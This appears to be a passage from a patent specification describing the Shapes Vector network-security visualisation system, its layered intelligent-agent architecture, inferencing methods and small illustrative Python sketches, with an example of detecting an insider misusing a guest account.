The mining and visualisation of large data sets for the purpose of extracting semantic details is a technique that is applied to many application domains. Several recent efforts have considered such approaches for deriving visual metrics for web-server performance and also for conveying the inter-relatedness of a set of HTML documents. Research undertaken by the NCSA considers the first of these types of data mining in an immersive virtual reality environment called Avatar. The basic approach adopted in their performance measurement work is to construct a virtual world of “scattercubes”, regions of space in which three of the many measured metrics are plotted against one another. The world contains enough scattercubes that every set of three metrics is compared in at least one. Users can browse this virtual world using either head-mounted displays or a virtual reality theatre, walking within a single cube and flying over the whole aggregation of cubes. More recently this same system has also been used for visualising the performance of massively parallel programs.
Other data-mining work has considered the derivation of semantics related to the interconnections of WWW-based information. The WAVE environment from the University of Arkansas aims to provide a 3D visualisation of a set of documents grouped according to conceptual analysis. Work at AT&T Bell considers plots of web-page access patterns which group pages according to their place in a web site's document hierarchy.
These efforts can be rendered with Shapes Vector's Data View display. The Avatar effort does not, however, share the Shapes Vector system's ability to effectively provide a semantic link between such data-oriented displays and geographic (or more abstract) views of the entities under consideration, nor does it represent the force paradigms used in Data View.
7.5 Parentage and Autograph
Parentage and its successor Autograph are visualisation tools constructed by the NSA for assisting analysts in the task of locating patterns and trends in data relating to operating communications networks. The tools act as post-processors to the collected data, analysing the interactions between senders and receivers of communications events. Based on this analysis the tools produce a representation of the network as a graph, with nodes describing the communications participants and the edges denoting properties of the aggregated communication observed between participants.
The user of the system may choose which of a pre-defined palette of graph layouts should be used to render the graph to the screen. The scalability of the provided layouts is limited and, as a means of supporting large data-sets, the tool allows for the grouping of nodes into clusters which are represented as single nodes within the rendered graph. Additionally, facilities exist for the displayed graph to be animated to reflect temporal aspects of the collected data.
While the aims of the Parentage and Autograph systems have some intersection with the visual sub-systems of Shapes Vector, the systems differ in a number of important regards. Firstly, the NSA software is not designed for real-time analysis. Secondly, the displays generated by Parentage and Autograph are not intended to provide strong user customisation facilities: the user may choose a layout from the provided palette, but beyond this no control of the rendered graph is available. Contrast this with the Shapes Vector approach, which stipulates that each of the views of the security domain must be extremely customisable to cater to the different abilities of users to locate patterns in the visual field (see Section 3).
It is interesting to note that this last point has been observed in practical use of Parentage and Autograph: while the provided visual palette allows some analysts to easily spot significant features, other users working with the same tools find it more difficult to locate notable items.
Appendix Part 1—Custom Control Environments for Shapes Vector
As described in the body of this section of the specification, the Shapes Vector system is a tool based upon the fundamental assertion that a user can visually absorb a large body of security-relevant data, and react. For such a capability and for a response to be effective, the Shapes Vector user must have access to a broad range of hardware peripherals, each offering a different style of interaction with the system. Section 2.2 of this part describes the types of peripherals which are present within the current system.
The exact physical configuration of peripherals presented to a user of the Shapes Vector system will depend upon the needs of the ‘role’ that user is playing within the (collaborative) information operation. It is considered that there are two types of operational roles: strategic/planning and tactical. Peripheral configurations catering to the specific interactive needs of users operating in each of these modes are outlined below.
A.1 Strategic Environment
Since the principal functions of a strategic Shapes Vector user focus primarily on non-real-time manipulation of data, there is little demand for speedy forms of interaction such as that afforded by joysticks and spaceballs. Instead, the core interactions available within this environment must be extremely precise: we envisage the use of conventional modes such as keyboard entry of requests or commands coupled with the gesture selection of items from menus (e.g. by mouse). Thus we would expect that a strategic Shapes Vector station might consist of a configuration similar to the traditional workstation: e.g., a desk with screen, keyboard and mouse atop.
A.2 Tactical Environment
In the course of a Shapes Vector information operation, one or more of the operations team will be operating in a tactical mode. In such a mode, real-time data is being continually presented to the user and speedy (real-time) feedback to the system is of critical importance. Such interactions must primarily be made through high-bandwidth stream-based peripherals such as joysticks and dials. The complexity of the virtual environment presented by Shapes Vector suggests that a high number of different real-time interactions may be possible or desirable.
To provide a capacity for quickly switching between these possible functions, we choose to present the user with a large number of peripherals, each of which is responsible for a single assigned interaction. Since some system interactions are more naturally represented by joysticks (e.g. flying through the virtual cyberspace) while others are more intuitively made using a dial (e.g. synthetic strobe frequency) and so on, we must also provide a degree of variety in the peripheral set offered to the user.
The technical issues involved in providing a large heterogeneous peripheral set in a traditional desktop environment are prohibitive. To this end a preferred design for a custom tactical control environment has been developed. The user environment depicted in FIG. 11 achieves the goal of integrating a large number of disparate input peripherals into a dense configuration such that a user may very quickly shift and apply attention from one device to another.
The following input devices are incorporated into a preferred Shapes Vector Tactical Control Station depicted in FIG. 11:
• two joysticks
• rudder pedals (not visible in the figure)
• two dial/switch panels
• keyboard (intended for the rare cases where slow but precise interaction is necessary)
• trackball
The principal display for the tactical user is a large projected screen area located some distance in front of the control station. However, a small LCD screen is also provided for displaying localised output (e.g. the commands typed on the keyboard).
PART 2 SHAPES VECTOR MASTER ARCHITECTURE
1. Introduction
The fundamental aspects of the Intelligent Agent Architecture (IAA) for the Shapes Vector system are discussed in this Part of the specification. Several unusual features of this architecture include a hierarchy of context free agents with no peer communication, a specific method for constructing ontologies which permits structured emergent behaviour for agents fusing knowledge, and the ability to undertake a semantic inferencing mechanism which can be related to human interfacing.
1.1 Shapes Vector Master Architecture
The master architecture diagram (FIG. 1) shows six main sub-systems to Shapes Vector:
• Sensor system. This sub-system comprises sensors that collect data. A typical example would be an Ethernet packet sniffer. Sensors may be local or remote and the communication path from the sensor and the rest of the system can take many forms ranging from a UNIX socket, through to a wireless network data link.
• The Intelligent Agent Architecture (Gestalt). This sub-system, described extensively in this paper, is responsible for processing sensor data and making intelligent deductions based on that input.
• The Tardis. This sub-system is a real-time manager of events and a global semantic mapper. It also houses the synthetic clock mechanism that is discussed in a later Part of this specification. The Tardis is capable of taking deductions from the Agent Gestalt and mapping them to an event with a specific semantic ready for visualisation.
• The Visuals. This sub-system actually comprises a number of "view" modules that can be regarded as sub-systems in their own right. Each view is built from common components, but visualises events input to it from the Tardis according to a fundamental display paradigm. For example, Geoview displays events and objects based on a geographic location paradigm (wherein it is possible to lay out objects according to a space coordinate system; multiple interpretations of the layout are possible, but a typical use is to lay out computers and other physical objects according to their physical location), whereas DataView lays out objects based on the level of interaction (forces) between them.
• The I/O system. This sub-system provides extensive faculties for users to navigate through the various views and interact with visualised objects.
• The Configuration system. This sub-system offers extensive features for customising the operation of all of the various sub-systems.
Essentially, the system operates by recording data from the sensors, inputting it into the Agent Gestalt, where deductions are made, passing the results into the Tardis, which then schedules them for display by the visualisation sub-system.
1.2 Precis of this Part of the Specification.
Portions of the information contained in the following sections will be a repeat of earlier sections of the specification. This is necessary due to the very large amount of information contained in this document and the need to refresh the reader's memory of the information in the more detailed context of this part. Section 2 of this part discusses the fundamentals of the agent architecture, which includes a discourse on the basic inferencing strategies for Shapes Vector agents. These inferencing strategies, described in Section 3 of this part, range from epistemic principles for agents with a "low level of abstraction" to a semantic vector-based scheme for reasoning under uncertainty. Of interest is the method utilised to link an agent's semantics with the semantics of interaction with a user. This link is achieved by adjusting and formalising a highly restricted subset of English.
In Section 4 of this part the basic rules of constructing an agent are described and of how they must inhabit the architectural framework. The architectural framework does not preclude the introduction of “foreign” agents as long as an interface wrapper is supplied to permit it to transfer its knowledge and deduction via the relevant ontological interfaces.
Section 5 of this part discusses the temporal aspects of intelligent agents. Section 6 of this part reveals some implications for the development of higher abstraction levels for agents when considering the fusing of data from lower abstraction level agents. The ontological basis for the first of these higher levels (level 2) is detailed in Section 7 of this part.
Section 8 of this part gives a brief overview of the requirement for intelligent interfaces with which a user may interact with the various elements of an agent Gestalt. Section 9 of this part provides some general comments on the architecture, while Section 10 of this part contrasts the system with the high-level work of Bass.
2. The Agent Architecture
Shapes Vector is intended to house large numbers of Intelligent Agents (IA's), with different domains of discourse. These agents make inferences and pass knowledge to one another in order to arrive at a set of deductions that permit a user to make higher level hypotheses.
2.1 Agent Architecture
The Shapes Vector system makes use of a multi-layer multi-agent knowledge processing architecture. Rather than attempting to bridge the entire semantic gap between base facts and high-level security states with a single software entity, this gap is divided into a number of abstraction layers. That is, we begin by considering the problem of mapping between base facts and a marginally more abstract view of the network. Once this (relatively easy) problem has been addressed, we move on to considering another layer of deductive processing from this marginally more abstract domain, to a yet more abstract domain. Eventually, within the upper strata of this layered architecture, the high-level concepts necessary to the visualisation of the network can be reasoned about in a straightforward and context-free fashion.
The resulting Shapes Vector Knowledge Architecture (SVKA) is depicted in FIG. 7. The layered horizontal boxes within the figure represent the various layers of knowledge elements. At the very bottom of the figure lies the store of all observed base facts (represented as a shaded box). Above this lies a deductive layer (termed “Level 1” of the Knowledge Architecture) which provides the first level of translation from base fact to slightly more abstract concepts.
In order to achieve knowledge transfer between agents which is both consistent and sound, an ontology (i.e. a formal knowledge representation) becomes imperative. Due to our approach of constructing our knowledge processing sub-system as a set of abstraction layers, we must consider knowledge exchange at a number of different levels of abstraction. To construct a single ontology capable of expressing all forms of knowledge present within the system is problematic due to the breadth of abstraction. Attempting such an ontology is unlikely to produce a tidy set of universal rules, and far more likely to produce a complex family of inter-related concepts with ad-hoc exceptions. More likely, due to the total domain of discourse being so broad, an ontology produced in this manner will be extremely context sensitive, leading to many possibilities for introducing ambiguities and contradictions.
Taking a leaf from our earlier philosophy of simplification through abstraction layering, we instead choose to define a set of ontologies: one per inter-layer boundary. FIG. 7 indicates these ontologies as curved arrows to the left of the agent stack.
The communication of factual knowledge to IAs in the first level of abstraction is by means of a simple ontology of facts (called the Level 1 Shapes Vector Ontology). All agents described within this portion of the specification make use of this mechanism to receive their input. It is worthwhile noting that the knowledge domain defined by this ontology is quite rigidly limited to incorporate only a universe of facts—no higher-level concepts or meta-concepts are expressible in this ontology. This simplified knowledge domain is uniform enough that a reasonably clean set of ontological primitives can be concisely described.
Interaction between IA's is strictly limited to avoid the possibility of ambiguity. An agent may freely report outcomes to the Shapes Vector Event Delivery sub-system, but inter-IA communication is only possible between agents at adjacent layers in the architecture. It is specifically prohibited for any agent to exchange knowledge with a “peer” (an agent within the same layer). If communication is to be provided between peers, it must be via an intermediary in an upper layer. The reasons underlying these rules of interaction are principally that they remove chances for ambiguity by forcing consistent domain-restricted universes of discourse (see below). Furthermore, such restrictions allow for optimised implementation of the Knowledge Architecture.
One specific optimisation made possible by these constraints—largely due to their capacity to avoid ambiguity and context—is that basic factual knowledge may be represented in terms of traditional context-free relational calculus. This permits the use of relational database technology in storage and management of knowledge. Thus, for simple selection and filtering procedures on the knowledge base we can utilise well known commercial mechanisms which have been optimised over a number of years rather than having to build a custom knowledge processor inside each intelligent agent.
Note that we are not suggesting that knowledge processing and retrieval is not required in an IA. Rather, by specifying certain requirements in a relational calculus (SQL is a preferable language), the database engine assists by undertaking a filtering process when presenting a view for processing by the IA. Hence the IA can potentially reap considerable benefits by only having to process the (considerably smaller) subset of the knowledge base which is relevant to the IA. This approach becomes even more appealing when we consider that the implementation of choice for Intelligent Agents is typically a logic language such as Prolog. Such environments may incur significant processing delays due to the heavy stack-based nature of processing on modern Von Neumann architectures. However, by undertaking early filtering processes using optimised relational engines and a simple knowledge structure, we can minimise the total amount of data that is input into potentially time consuming tree and stack-based computational models.
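As an illustration of this pre-filtering approach, the following is a minimal sketch (not the actual Shapes Vector implementation) in which a hypothetical relational fact table is queried via SQL so that only the rows relevant to an agent's domain of discourse reach its deductive engine; the schema, table and column names are assumptions made purely for the example.

```python
import sqlite3

# Minimal sketch (hypothetical schema): level 1 base facts are held as simple
# relational rows; the IA pushes a selection down to the database so that only
# the facts relevant to its domain of discourse reach its deductive engine.
conn = sqlite3.connect("knowledge_base.db")
conn.execute(
    "CREATE TABLE IF NOT EXISTS fact "
    "(subject TEXT, relation TEXT, object TEXT, observed_at REAL)"
)

def facts_for_agent(relation_of_interest, aperture_start, aperture_end):
    """Return only the base facts this agent cares about, pre-filtered by SQL."""
    cursor = conn.execute(
        "SELECT subject, relation, object FROM fact "
        "WHERE relation = ? AND observed_at BETWEEN ? AND ?",
        (relation_of_interest, aperture_start, aperture_end),
    )
    return cursor.fetchall()

# The (much smaller) result set is then handed to the agent's logic engine.
relevant_facts = facts_for_agent("listens-on", 0.0, 3600.0)
```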
The placement of intelligent agents within the various layers of the knowledge architecture is decided based upon the abstractions embodied within the agent and the knowledge transforms provided by the agent. Two criteria are considered in determining whether a placement at layer n is appropriate:
• would the agent be context sensitive in the level n ontology? If so, it should be split into two or more agents.
• does the agent perform data fusion from one or more entities at level n? If so it must be promoted to at least level n+1 (to adhere to the requirement of no “horizontal” interaction)
2.2 A Note on the Tardis
A more detailed description of the Tardis is provided in part 5 of the specification.
The Tardis connects the IA Gestalt to the real-time visualisation system. It also controls the system's notion of time in order to permit facilities such as replay and visual or other analysis anywhere along the temporal axis from the earliest data still stored to the current real world time.
The Tardis is unusual in its ability to connect an arbitrary semantic or deduction to a visual event. It does this by acting as a very large semantic patch-board. The basic premise is that for every agreed global semantic (e.g. X window packet arrived [attribute list]) there is a specific slot in an infinite sized table of globally agreed semantics. For practical purposes there are 2^64 slots, which is therefore the current maximum number of agreed semantics available in our environment. No slot, once assigned a semantic, is ever reused for any other semantic. Agents that arrive at a deduction which matches the slot semantic simply queue an event into the slot. The visual system is profiled to match visual events with slot numbers. Hence visual events are matched to semantics.
As with the well-known IP numbers and Ethernet addresses, the Shapes Vector strategy is to have incremental assignment of semantics to slots. Various taxonomies etc. are being considered for slot grouping. As the years go by, it is expected that some slots will fall into disuse as the associated semantic is no longer relevant, while others are added. It is considered highly preferable, for obvious reasons, that no slot be reused.
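The slot mechanism can be pictured with the following minimal sketch; it is an illustrative model only, and the class, field and slot names are assumptions rather than the Tardis' actual interface.

```python
from collections import defaultdict, deque

# Minimal sketch of the "semantic patch-board" idea: each globally agreed semantic
# owns a fixed slot number in a 2**64 space; agents queue events into a slot, and
# the visual system maps slot numbers to visual events. All names are hypothetical.
SLOT_SPACE = 2 ** 64

class Tardis:
    def __init__(self):
        self.queues = defaultdict(deque)   # slot number -> queued events
        self.visual_profile = {}           # slot number -> visual event identifier

    def queue_event(self, slot, attributes):
        if not 0 <= slot < SLOT_SPACE:
            raise ValueError("slot outside the agreed semantic space")
        self.queues[slot].append(attributes)

    def next_visual_event(self, slot):
        """Pop the oldest event for a slot and pair it with its visual mapping."""
        if self.queues[slot]:
            return self.visual_profile.get(slot), self.queues[slot].popleft()
        return None

tardis = Tardis()
tardis.visual_profile[42] = "x-window-packet-glyph"   # profiled visual event
tardis.queue_event(42, {"src": "10.0.0.1", "dst": "10.0.0.2"})
```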
As mentioned, further discussion about the Tardis and its operation can be found in part 5 of the specification.
3. Inferencing Strategies
The fundamental inferencing strategy underlying Shapes Vector is to leave inductive inferencing as the province of the (human) user and deductive inferencing as typically the province of the IA's. It is expected that a user of the system will examine deductive inferences generated by a set of IA's, coupled with visualisation, in order to arrive at an inductive hypothesis. This separation of duties markedly simplifies the implementation strategies of the agents themselves. Nevertheless, we propose further aspects that may produce a very powerful inferencing system.
3.1 Traditional
Agents can employ either forward chaining or backward chaining, depending on the role they are required to fulfil. For example, some agents continuously comb their views of the knowledge base in attempts to form current, up to date, deductions that are as “high level” as possible. These agents employ forward chaining and typically inhabit the lower layers of the agent architecture. Forward chaining agents also may have data stream inputs from low level “sensors”. Based on these and other inputs, as well as a set of input priorities, these agents work to generate warnings when certain security-significant deductions become true.
Another set of agents within the Shapes Vector system will be backward chaining (goal driven) agents. These typically form part of the “User Avatar Set”: a collection of knowledge elements, which attempt to either prove or disprove user queries (described more fully in Section 8 of this part.).
3.2 Possiblistic
In executing the possiblistic features incorporated into the level 2 ontology (described in Section 7.1 of this part), agents may need to resort to alternative logics. This is implied by the inherent multi-valued nature of the possiblistic universe. Where a universe of basic facts can be described succinctly in terms of a fact existing or not existing, the situation is more complex when symbolic possibility is added. For our formulation we chose a three-valued possiblistic universe, in which a fact may be existent, non-existent, or possibly existent.
To reason in such a universe we adopt two different algebras. The first is a simple extension of the basic principle of unification common to computational logic (a minimal sketch of this extended unification follows the list below). Instead of the normal assignation of successful unification to existence and unsuccessful unification to non-existence, we adopt the following:
• successful unification implies existence,
• the discovery of an explicit fact which precludes unification implies non-existence (this is referred to as a hard fail),
• unsuccessful unification without an explicit precluding case implies possible existence (this is referred to as a soft fail)
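The following minimal sketch illustrates the three-valued outcome of this extended unification; the tuple-based fact encoding and the positive/negative fact sets are assumptions made for the example, not the actual agent implementation.

```python
# Minimal sketch (assumed fact representation): facts are (subject, relation, object)
# tuples held in a positive set and an explicit negative set. A match in the positive
# set => existence; a match in the negative set => hard fail (non-existence);
# neither => soft fail (possible existence).
EXISTS, NOT_EXISTS, POSSIBLE = "exists", "not-exists", "possible"

def possiblistic_lookup(fact, positive_facts, negative_facts):
    if fact in positive_facts:
        return EXISTS
    if fact in negative_facts:
        return NOT_EXISTS          # explicit precluding fact: hard fail
    return POSSIBLE                # no match either way: soft fail

positive = {("proc1234", "listens-on", "port21")}
negative = {("proc1234", "listens-on", "port80")}
print(possiblistic_lookup(("proc1234", "listens-on", "port21"), positive, negative))   # exists
print(possiblistic_lookup(("proc1234", "listens-on", "port80"), positive, negative))   # not-exists
print(possiblistic_lookup(("proc987", "listens-on", "port1022"), positive, negative))  # possible
```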
A second algebra, which may be used to reason in the possiblistic universe, involves a technique known as “predicate grounding” in which a user-directed pruning of a unification search allows for certain specified predicates to be ignored (grounded) when possibilities are being evaluated.
3.3 Vectors
Agents operating at higher levels of the Shapes Vector Knowledge Architecture may require facilities for reasoning about uncertain and/or incomplete information in a more continuous knowledge domain. Purely traditional forward or backward chaining does not easily express such reasoning, and the three-valued possiblistic logic may lack the necessary quantitative features desired. To implement such agents an alternative inferencing strategy is used based upon notions of vector algebra in a multi-dimensional semantic space. This alternative strategy is employed in conjunction with more conventional backward chaining techniques. The use of each of the paradigms is dependent on the agent, and the domain of discourse.
Our vector-based approach to inferencing revolves around constructing an abstract space in which relevant facts and deductions may be represented by geometrical analogues (such as points and vectors), with the proper algebraic relationships holding true. In general, the construction of such a space for a large knowledge domain is extremely difficult. For Shapes Vector, we adopt a simplifying strategy of constructing several distinct deductive spaces, each limited to the (relatively small) domain of discourse of a single intelligent agent. The approach is empirical and is only feasible if each agent is restricted to a very small domain of knowledge so that construction of its space is not overly complex.
The definition of the deductive space for an IA is a methodical and analytical process undertaken during the design of the agent itself. It involves a consideration of the set of semantic concepts (“nouns”) which are relevant to the agent, and across which the agent's deductions operate. Typically this concept set will contain elements of the agent's layer ontology as well as nouns which are meaningful only within the agent itself. Once the agent's concept set has been discovered, we can identify within it a subset of ‘base nouns’—concepts which cannot be defined in terms of other members of the set. This identification is undertaken with reference to a semi-formal ‘connotation spectrum’ (a comparative metric for ontological concepts).
Such nouns have two important properties:
• each is semantically orthogonal to every other base noun, and
• every member of the concept set which is not a base noun can be described as a combination of two or more base nouns.
Collectively, an IA's set of n base nouns defines a n-dimensional semantic space (in which each base noun describes an axis). Deductions relevant to the agent constitute points within this space; the volume bounded by spatial points for the full set of agent deductions represents the sub-space of possible outputs from that agent. A rich set of broad-reaching deductions leads to a large volume of the space being covered by the agent, while a limited deduction set results in a very narrow agent of more limited utility (but easier to construct). Our present approach to populating the deductive space is purely empirical, driven by human expert knowledge. The onus is thus upon the designer of the IA to generate a set of deductions, which (ideally) populate the space in a uniform manner.
In reality, the set of deductions that inhabit the space can become quite non-uniform (“clumpy”) given this empirical approach. Hence rigorous constraint on the domain covered by an agent is entirely appropriate. Of course this strategy requires an appropriate mechanism at a higher abstract layer. However, the population of a higher-layer agent can utilise the agents below it in a behavioural manner, thereby treating them as sub-spaces.
Once an agent's deductive space has been constructed and populated with deductions (points), it may be used to draw inferences from observed facts. This is achieved by representing all available and relevant facts as vectors in the multi-dimensional semantic space and considering how these vectors are located with respect to deduction points or volumes. A set of fact vectors, when added using vector algebra, may precisely reach a deduction point in the space. In that situation, a deductive inference is implied. Alternatively, even in the situation where no vectors or combinations of vectors precisely inhabit a deduction point, more uncertain reasoning can be performed using mechanisms such as distance metrics. For example, it may be implied that a vector which is “close enough” to a deduction point is a weak indicator of that deduction. Furthermore, in the face of partial data, vector techniques may be used to home in on inferences by identifying facts (vectors), currently not asserted, which would allow for some significant deduction to be drawn. Such a situation may indicate that the system should perhaps direct extra resources towards discovering the existence (or otherwise) of a key fact.
The actual inferencing mechanism to be used within higher-level Shapes Vector agents is slightly more flexible than the scheme we have described above. Rather than simply tying facts to vectors defined in terms of the IA's base nouns, we can define an independent but spatially continuous ‘fact space’. FIG. 8 demonstrates the concept: a deductive space has been defined in terms of a set of base nouns relevant to the IA. Occupying the same spatial region is a fact space, whose axes are derived from the agent's layer ontology. Facts are defined as vectors in this second space: that is, they are entities fixed with respect to the fact axes. However, since the fact space and deduction space overlap, these fact vectors also occupy a location with respect to the base noun axes. It is this location which we use to make deductive inferences based upon fact vectors. Thus, in the Figure, the fact that the observed fact vector (arrow) is close to one of the deductions (dots) may allow for assertion of that deduction with a particular certainty value (a function of exactly how close the vector is to the deduction point). Note that, since the axes of the fact space are independent of the axes of the deductive space, it is possible for the former to vary (shift, rotate and/or translate, perhaps independently) with respect to the latter. If such a variation occurs, fact vectors (fixed with regard to the fact axes) will have different end-points in deduction-space. Therefore, after such a relative change in axes, a different set of deductions may be inferred with different confidence ratings. This mechanism of semantic relativity may potentially be a powerful tool for performing deductive inferencing in a dynamically changing environment.
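As an illustrative sketch only, the following shows how summed fact vectors might be compared against deduction points using a distance metric, with distance mapped to a certainty value; the three-dimensional base-noun space, the deduction names, the coordinates and the distance-to-certainty mapping are all assumptions made for the example.

```python
import math

# Minimal sketch, assuming a 3-dimensional base-noun space and Euclidean distance
# as the metric. Deduction names and coordinates are purely illustrative.
DEDUCTIONS = {
    "host-is-web-server": (1.0, 0.0, 1.0),
    "host-is-mail-relay": (0.0, 1.0, 1.0),
}

def add_vectors(fact_vectors):
    """Sum a list of fact vectors component-wise."""
    return tuple(sum(components) for components in zip(*fact_vectors))

def infer(fact_vectors, threshold=0.5):
    """Return (deduction, certainty) pairs for deduction points near the summed facts."""
    point = add_vectors(fact_vectors)
    results = []
    for name, target in DEDUCTIONS.items():
        distance = math.dist(point, target)
        certainty = max(0.0, 1.0 - distance)   # crude distance-to-certainty mapping
        if certainty >= threshold:
            results.append((name, certainty))
    return results

# Two observed facts whose vector sum lands close to the "web server" deduction.
print(infer([(0.6, 0.0, 0.5), (0.35, 0.0, 0.45)]))
```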
An interesting aspect of the preferred approach to vector-based deductive inference is that it is based fundamentally upon ontological concepts, which can in turn be expressed as English nouns. This has the effect that the deductions made by an agent will resemble simple sentences in a very small dialect of pseudo-English. This language may be a useful medium for a human to interact with the agent in a relatively natural fashion.
While the inferencing strategy described above has some unorthodox elements in its approach to time-varying probabilistic reasoning for security applications, there are more conventional methods that may be used within Shapes Vector IA's in the instance that the method falls short of its expected deductive potential. Frame based systems offer one well understood (although inherently limited) alternative paradigm. Indeed, it is expected that some IA's will be frame based in any case (obtained off the shelf and equipped with ontology to permit knowledge transfer with the knowledge base).
As described above, the vector-based deductive engine is able to make weak assertions of a deduction with an associated certainty value (based on distances in n-Dimensional space). This value can be interpreted in a variety of ways to achieve different flavours of deductive logic. For example, the certainty value could potentially be interpreted as a probability of the assertion holding true, derived from a consideration of the current context and encoded world knowledge. Such an interpretation delivers a true probabilistic reasoning system. Alternatively, we could potentially consider a more rudimentary interpretation wherein we consider assertions with a certainty above a particular threshold (e.g. 0.5) to be “possible” within a given context. Under these circumstances, our system would deliver a possiblistic form of reasoning. Numerous other interpretations are also possible.
3.4 Inferencing for Computer Security Applications
As presented, our IA architecture is appropriate to knowledge processing in any number of domains. To place the work into the particular context, for which it is primarily intended, we will now consider a simple computer security application of this architecture.
One common, but often difficult, task facing those charged with securing a computer network is detecting access of network assets which appears authorised (e.g., the user has the proper passwords etc) but is actually malicious. Such access incorporates the so-called “insider threat” (i.e., an authorised user misusing their privileges) as well as the situation where confidentiality of the identification system has been compromised (e.g., passwords have been stolen). Typically, Intrusion Detection Systems are not good at detecting such security breaches, as they are purely based on observing signatures relating to improper use or traffic.
Shapes Vector's comprehensive inferencing systems allow it to deduce a detailed semantic model of the network under consideration. This model coupled with a user's inductive reasoning skills, permits detection of such misuse even in the absence of any prior-known “signature”.
This application of Shapes Vector involves constructing a Gestalt of Intelligent Agents that are capable of reasoning about relatively low-level facts derived from the network. Typically these facts would be in the form of observations of traffic flow on the network. Working collaboratively, the agents deduce the existence of computers on the network and their intercommunication. Other agents also deduce attributes of the computers and details of their internal physical and logical states. This information serves two purposes: one is to build up a knowledge base concerning the network, and another is to facilitate the visualisation of the network. This latter output from the agents is used to construct a near real-time 3D visualisation showing the computers and network interfaces known to exist and their interconnection. Overlaid onto this “map” is animation denoting the traffic observed by the agents, classified according to service type.
Observing such a Shapes Vector visualisation, a user may note some visual aspect that they consider to be atypical. For example, the user may note a stream of telnet packets (which itself might be quite normal) traversing the network between the primary network server and a node which the visualisation shows as only a network interface. The implications of such an observation are that a node on the network is generating a considerable body of data, but this data is formatted such that none of the Shapes Vector agents can deduce anything meaningful about the computer issuing the traffic (thus no computer shape is visualised, just a bare network interface).
The human user may consider this situation anomalous: given their experience of the network, most high volume traffic emitters are identified quickly by one or more of the various IAs. While the telnet session is legitimate, in as much as the proper passwords have been provided, the situation bears further investigation.
To probe deeper, the User Avatar component of Shapes Vector, described more fully in Section 8 in Part 2 of the specification, can be used to directly query the detailed knowledge base the agents have built up behind the (less-detailed) visualisation. The interaction in this situation might be as follows:
• human> answer what User is-logged-into Computer “MainServer”?
• gestalt> Relationship is-logged-into [User Boris, Computer MainServer]
This reveals a user name for the individual currently logged into the server. A further interaction might be:
• human> find all User where id=“Boris”?
• gestalt> Entity User (id=Boris, name=“Boris Wolfgang”, type=“guest user”)
An agent has deduced at some stage of knowledge processing that the user called Boris is logged in using a guest user account. The Shapes Vector user would be aware that this is also suspicious, perhaps eliciting a further question:
• human> answer what is-owned-by User “Boris”?
• gestalt> Relationship is-owned-by [File passwords, User Boris]
• Relationship is-owned-by [Process keylogger, User Boris]
• Relationship is-owned-by [Process passwordCracker, User Boris]
The facts have, again, been deduced by one or more of the IA's during their processing of the original network facts. The human user, again using their own knowledge and inductive faculties, would become more suspicious. Their level of suspicion might be such that they take action to terminate Boris' connection to the main server.
In addition to this, the user could ask a range of possiblistic and probabilistic questions about the state of the network, invoking faculties in the agent Gestalt for more speculative reasoning.
3.5 Other Applications
The IA architecture disclosed herein lends itself to other applications. For example, it is not uncommon for the Defence community to have many databases in just as many formats. It is very difficult for analysts to peruse these databases in order to gain useful insight. There has been much effort aimed at considering how particular databases may be structured in order for analysts to achieve their objectives. The problem has proved to be difficult. One of the major hurdles is that extracting the analysts' needs and codifying them to structure the data leads to different requirements not only between analysts, but also different requirements depending on their current focus. One of the consequences is that in order to structure the data correctly, it must be context sensitive, which a relational database is not equipped to handle.
Shapes Vector can overcome many of the extant difficulties by permitting knowledge and deduction rules to be installed into an IA. This IA, equipped with a flexible user interface and strictly defined query language, can then parse the data in a database in order to arrive at a conclusion. The knowledge rules and analyst-centric processing are encoded in the IA, not in the structure of the database itself, which can thus remain context free. The Shapes Vector system allows incremental adjustment of the IA without having to re-format and restructure a database through enhancement of the IA, or through an additional IA with relevant domain knowledge. Either the IA makes the conclusion, or it can provide an analyst with a powerful tool to arrive at low level deductions that can be used to arrive at the desired conclusion.
4. Rules for Constructing an Agent
In Section 2 of this part of the specification, several rules governing agents were mentioned, e.g. no intra-level communication and each agent must be context free within its domain of discourse. Nevertheless, there are still a number of issues which need clarification to see how an agent can be constructed, and some of the resultant implications.
In a preferred arrangement the three fundamental rules that govern the construction of an agent are:
• 1. All agents within themselves must be context free;
• 2. If a context sensitive rule or deduction becomes apparent, then the agent must be split into two or more agents;
• 3. No agent can communicate with its peers in the same level. If an agent's deduction requires input from a peer, then the agent must be promoted to a higher level, or a higher level agent constructed which utilises the agent and the necessary peer(s).
In our current implementation of Shapes Vector, agents communicate with other entities via the traditional UNIX sockets mechanism as an instantiation of a component control interface. The agent architecture does not preclude the use of third party agents or systems. The typical approach to dealing with third party systems is to provide a “wrapper” which permits communication between the system and Shapes Vector. This wrapper needs to be placed carefully within the agent hierarchy so that interaction with the third party system is meaningful in terms of the Shapes Vector ontologies, as well as permitting the wrapper to act as a bridge between the third party system and other Shapes Vector agents. The wrapper appears as just another SV agent.
One of the main implications of the wrapper system is that it may not be possible to gain access to all of the features of a third party system. If the knowledge cannot be carried by the ontologies accessible to the wrapper, then the knowledge elements cannot be transported throughout the system. There are several responses to such cases:
• 1. The wrapper may be placed at the wrong level.
• 2. The Ontology may be deficient and in need of revision.
• 3. The feature of the third party system may be irrelevant and therefore no adjustments are required.
5. Agents and Time
In this section we discuss the relationship between the operation of agents and time. The two main areas disclosed are how the logic based implementation of agents can handle data streams without resorting to an embedded, sophisticated temporal logic, and the notion of synthetic time in order to permit simulation, and analysis of data from multiple time periods.
5.1 Data Streams and IA's
One of the fundamental problems facing the use of IA's in the Shapes Vector system is the changing status of propositions. More precisely, under temporal shifts, all “facts” are predicates rather than propositions. This issue is further complicated when we consider that typical implementations of an IA do not handle temporal data streams.
We address this problem by providing each IA with a “time aperture” over which it is currently processing. A user or a higher level agent can set the value of this aperture. Any output from an IA is only relevant to its time aperture setting (FIG. 10). The aperture mechanism allows the avoidance of issues such as contradictions in facts over time, as well as providing a finite data set in what is really a data stream. In fact, the mechanism being implemented in our system permits multiple, non-intersecting apertures to be defined for data input.
With time apertures, we can “stutter” or “sweep” along the temporal domain in order to analyse long streams of data. Clearly, there are a number of issues which must still be addressed. Chief amongst these is the fact that an aperture may be set which does not cover, or only partially covers, the data set from which a critical deduction must be made. Accordingly, strategies such as aperture change and multiple apertures along the temporal domain must be implemented in order to raise confidence that the relevant data is input in order to arrive at the relevant deduction.
